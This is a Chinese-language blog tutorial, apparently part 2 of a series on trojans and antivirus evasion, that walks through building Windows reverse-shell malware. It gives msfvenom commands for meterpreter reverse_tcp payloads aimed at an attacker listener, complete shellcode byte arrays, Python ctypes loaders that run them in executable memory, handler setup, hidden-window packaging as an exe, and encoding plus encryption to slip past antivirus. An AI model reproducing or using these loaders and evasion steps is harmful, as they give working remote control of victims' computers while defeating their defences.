木马与免杀(2), msfvenom 工具, shellcode代码, shellcode加载器
Shellcode是一段用于利用软件漏洞而执行的代码,通常以16进制机器码形式编写,因为它经常让攻击者获得shell的名称[1]。Shellcode的主要目的是让攻击者的恶意代码在受害者的计算机上执行,从而实现对系统的控制或数据的修改、窃取或上传等目的。
Shellcode的内容通常是一段可以在受害者的计算机上执行的机器代码,用于实现攻击者的目标。这段代码可以是出于恶作剧目的弹出一个消息框,也可以出于攻击目的的删改重要文件、窃取数据、上传木马病毒并运行,甚至是出于破坏目的格式化硬盘等。
Shellcode的编写通常涉及以下步骤:
- 利用系统漏洞获得控制权。
- 编写恶意代码,将其转换为16进制机器码。
- 将生成的shellcode插入到攻击者控制的程序中,例如C程序或脚本。
- 编译并执行攻击者控制的程序,以便在受害者的计算机上执行shellcode。
Shellcode的编写可以使用各种编程语言和工具,如C、Python、汇编语言等。在编写shellcode时,需要注意系统调用问题和坏字符问题等。为了避免被反汇编器和反病毒软件检测到,攻击者可能需要对shellcode进行编码和变形。
1. msfvenom 支持的语言脚本:
c csharp dw dword go golang hex java js_be js_le masm nim nimlang num perl pl powershell ps1 py python raw rb ruby rust rustlang sh vbapplication vbscript
2. 生成shellcode
这里以python脚本为例, 32位和64位不同.
生成32位版本shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.201 LPORT=5555 -f py -o sc.py
生成64位版本shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.112.201 LPORT=5555 -f py -o sc64.py
查看sc.py的内容, shellcode是一段字节码:
buf = b""
buf += b"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64"
buf += b"\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x31\xff\x0f"
buf += b"\xb7\x4a\x26\x8b\x72\x28\x31\xc0\xac\x3c\x61\x7c"
buf += b"\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52"
...
...
3. 手动编写shellcode加载器
使用Python编写一个加载器来执行shellcode。
一般来说,可以使用ctypes库来调用Windows API来完成加载shellcode的操作。
首先使用VirtualAlloc函数创建一个内存空间,然后使用RtlMoveMemory函数将shellcode复制到该空间中。
最后,使用CreateThread函数创建一个新线程来执行shellcode,并使用WaitForSingleObject函数等待线程结束。
需要注意的是,这个示例代码只能在Windows系统上运行
python 32位版本
import ctypes
# Your shellcode
buf = b""
buf += b"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64"
buf += b"\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x31\xff\x0f"
buf += b"\xb7\x4a\x26\x8b\x72\x28\x31\xc0\xac\x3c\x61\x7c"
buf += b"\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52"
buf += b"\x8b\x52\x10\x8b\x42\x3c\x57\x01\xd0\x8b\x40\x78"
buf += b"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58"
buf += b"\x20\x01\xd3\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34"
buf += b"\x8b\x01\xd6\x31\xc0\xc1\xcf\x0d\xac\x01\xc7\x38"
buf += b"\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58"
buf += b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
buf += b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b"
buf += b"\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12"
buf += b"\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8"
buf += b"\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
buf += b"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x70"
buf += b"\xc9\x68\x02\x00\x15\xb3\x89\xe6\x50\x50\x50\x50"
buf += b"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97"
buf += b"\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85"
buf += b"\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
buf += b"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"
buf += b"\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68"
buf += b"\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5"
buf += b"\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += b"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
buf += b"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
buf += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff"
buf += b"\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff"
buf += b"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2"
buf += b"\x56\x6a\x00\x53\xff\xd5"
# Memory allocation for the shellcode
shellcode = bytearray(buf)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# Place the shellcode in memory
buf_ptr = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf_ptr,
ctypes.c_int(len(shellcode)))
# Create a thread using Windows API to execute the shellcode
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# Wait for the thread to complete execution
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
python 64位版本
import ctypes
buf = b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
buf += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
buf += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x4d\x31\xc9"
buf += b"\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50\x48\x31\xc0"
buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
buf += b"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b\x42\x3c"
buf += b"\x41\x51\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"
buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x50"
buf += b"\x49\x01\xd0\x8b\x48\x18\xe3\x56\x48\xff\xc9\x41"
buf += b"\x8b\x34\x88\x4d\x31\xc9\x48\x01\xd6\x48\x31\xc0"
buf += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58"
buf += b"\x48\x01\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"
buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
buf += b"\x49\xbc\x02\x00\x15\xb3\xc0\xa8\x70\xc9\x41\x54"
buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"
buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"
buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"
buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"
buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"
buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"
buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"
buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"
buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"
buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
buf += b"\xf0\xb5\xa2\x56\xff\xd5"
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(0, len(buf),0x3000,0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), ctypes.create_string_buffer(buf), len(buf))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(ptr), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
只要在目标主机上用python执行这个加载器就可以反向连接到攻击主机.
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.112.201
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > run
也可以用python打包工具pyinstaller将py脚本打包为exe程序到目标主机执行.
pyinstaller -F -w sc.py
4. 使用 ShellCode Loader 开源工具创建加载器
https://github.com/Axx8/ShellCode_Loader/releases/tag/v0.0.1
解压缩到目录 ShellCode_Loader
在kali中生成一个c语言的shellcode, 采用x64/xor_dynamic编码:
msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.112.201 LPORT=5555 -f c -o sc64.c
来到 ShellCode_Loader 目录, 用 Shellcode_encryption.exe 对shellcode加密:
.\Shellcode_encryption.exe .\sc64.c
注意:
该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全 法》
项目地址:
https://github.com/Axx8/ShellCode_Loader
密文Shellcode: fP4gr8UIuW2/2YoS/EBYxX8IJNy0rF099ekFPhSsQQN1EdQq0XuYY/f8agu8owG2V7rJJPJV5yJMBbc0brXUR5WVEjTNi7IMefVGqB43X97JG8SyjLHnn8FcbUIGYoHTeW1GOnflG+AHxTfL2YRC4wmwp/A/VAmn3V4Dd/nVWGdUCpbmu2WSQszwkfcYUFmE2EViLleUhdbs2U30UXAQxSZ6KXA+qjMr7cTTxmEkqngLMEFdTLn6s+rl2Au2093HCPN8GOQHITfbMPBBvv9kPFINe6HOM4bESkVgiG0HHzcAaTJfdCMLt0S+4Ax25MciyCYajeUV6kaLTLGk4KAT9wuiTE5SNHI3XeM885PWzCH+P/cGSSAjjphbfz/VJ9vUNsUcMOWJO2m+81ovLn+EgVKX+JzuZj91VFx9qOiIRwD6bbhMNfRRROIxY92ACHS8dZ3fI7m9OBj3mNmkPiCucQPl3PYIfw717BF2jxNHFA0lVyeqr4pjdPSNBZGbbY/BlFqYPuoW5zEzOt4ASTVpfh2SIAVFuXmKhiIiSVh8xgHr0+fs9vuEQWX3QwcX2n0CotglmKAFy0UTemiStSnJ2P3EejJiH52s8XfzQzpAH6qXLSYio3JadYjPEMuiXuupjVwkEuJmHO3mv3VE2wDmmg957JnzeY0UwsdfV8uTLAmlsTn+KcGOU7f0kUPqO2G64xVCEQy3pNnhxlFZIMyl4NkC/c2QrNeuEOsFiWzFXGD2GHru0WWWmzlKm92hvYeBK+X4Po+vXNcnF++ZP7G3NbESDAeNh5iWFr1wnlOsB1upVHAnznMGAw5PC4roSxGznsjQoRYuA+3+jc77BfKjvSarsz/g/GLMESxaBggoBTrTPGphlzY=
编辑相同目录下的 ShellCode_Loader.py, 来到代码的最下面, 用上面生成的密文修改变量 Data:
Data = 'fP4gr8UIuW2/2YoS/EBYxX8IJNy0rF099ekFPhSsQQN1EdQq0XuYY/f8agu8owG2V7rJJPJV5yJMBbc0brXUR5WVEjTNi7IMefVGqB43X97JG8SyjLHnn8FcbUIGYoHTeW1GOnflG+AHxTfL2YRC4wmwp/A/VAmn3V4Dd/nVWGdUCpbmu2WSQszwkfcYUFmE2EViLleUhdbs2U30UXAQxSZ6KXA+qjMr7cTTxmEkqngLMEFdTLn6s+rl2Au2093HCPN8GOQHITfbMPBBvv9kPFINe6HOM4bESkVgiG0HHzcAaTJfdCMLt0S+4Ax25MciyCYajeUV6kaLTLGk4KAT9wuiTE5SNHI3XeM885PWzCH+P/cGSSAjjphbfz/VJ9vUNsUcMOWJO2m+81ovLn+EgVKX+JzuZj91VFx9qOiIRwD6bbhMNfRRROIxY92ACHS8dZ3fI7m9OBj3mNmk+geZ9hKm4CEjTZ7xZy7+Hb41WJmsMgLmRpG9bnsfcMXqFxJYLTJ6yJucFOoMBqzMS8ad3lgETWOT1VnQB1ATeiuRsuSVpTW50TQKQ2jWL310gK+WqcgjOSdAPiCucQPl3PYIfw717BF2jxNHFA0lVyeqr4pjdPSNBZGbbY/BlFqYPuoW5zEzOt4ASTVpfh2SIAVFuXmKhiIiSVh8xgHr0+fs9vuEQWX3QwcX2n0CotglmKAFy0UTemiStSnJ2P3EejJiH52s8XfzQzpAH6qXLSYio3JadYjPEMuiXuupjVwkEuJmHO3mv3VE2wDmmg957JnzeY0UwsdfV8uTLAmlsTn+KcGOU7f0kUPqO2G64xVCEQy3pNnhxlFZIMyl4NkC/c2QrNeuEOsFiWzFXGD2GHru0WWWmzlKm92hvYeBK+X4Po+vXNcnF++ZP7G3NbESDAeNh5iWFr1wnlOsB1upVHAnznMGAw5PC4roSxGznsjQoRYuA+3+jc77BfKjvSarsz/g/GLMESxaBggoBTrTPGphlzY='
这样加载器就制作好了, 直接执行这个py脚本就可以反向连接到kali上,
或者制作成一个exe文件来执行:
pyinstaller -F -w ShellCode_Loader.py
5473
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
